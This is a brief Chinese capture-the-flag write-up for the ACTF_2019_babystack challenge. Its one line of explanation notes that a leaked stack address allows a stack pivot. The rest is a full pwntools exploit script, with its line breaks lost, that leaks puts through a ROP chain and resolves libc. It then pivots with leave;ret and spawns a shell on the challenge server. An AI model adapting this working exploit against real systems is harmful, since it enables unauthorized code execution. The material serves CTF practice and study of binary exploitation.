栈迁移,给了esp的地址,只要迁移回去就行了
#coding=utf8from pwn import *from LibcSearcher import*context.log_level = 'debug'def debug():gdb.attach(io)pause()#io =process('./ACTF_2019_babystack')io = remote("node4.buuoj.cn",27431)#libc=ELF('./libc-2.27.so')elf =ELF('./ACTF_2019_babystack')puts_plt = elf.plt['puts']puts_got = elf.got['puts']main_addr = 0x4008F6#gdb.attach(io)io.recvuntil('>')io.sendline('224')io.recvuntil('Your message will be saved at ')stack_addr = io.recv(14)stack_addr =int(stack_addr,16)print(hex(stack_addr))pop_rdi_ret = 0x0000000000400ad3pop_rsi__r15_ret =0x0000000000400ad1leave_ret = 0x0000000000400A18offest = 0xd0payload = b'a'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)payload =payload.ljust(0xd0,b'a')payload+=p64(stack_addr)+p64(leave_ret)io.recvuntil('>')io.send(payload)#pause()puts_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))print('puts_addr:'+hex(puts_addr))libc = LibcSearcher('puts',puts_addr)system_addr = puts_addr-libc.dump('puts')+libc.dump('system')str_bin_sh = puts_addr-libc.dump('puts')+libc.dump('str_bin_sh')io.recvuntil('>')io.sendline('224')io.recvuntil('Your message will be saved at ')stack_addr = io.recv(14)stack_addr =int(stack_addr,16)payload = b'a'*8+p64(leave_ret+1)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system_addr)payload =payload.ljust(0xd0,b'a')payload+=p64(stack_addr)+p64(leave_ret)io.send(payload)io.interactive()
若有收获,就点个赞吧
0 人点赞
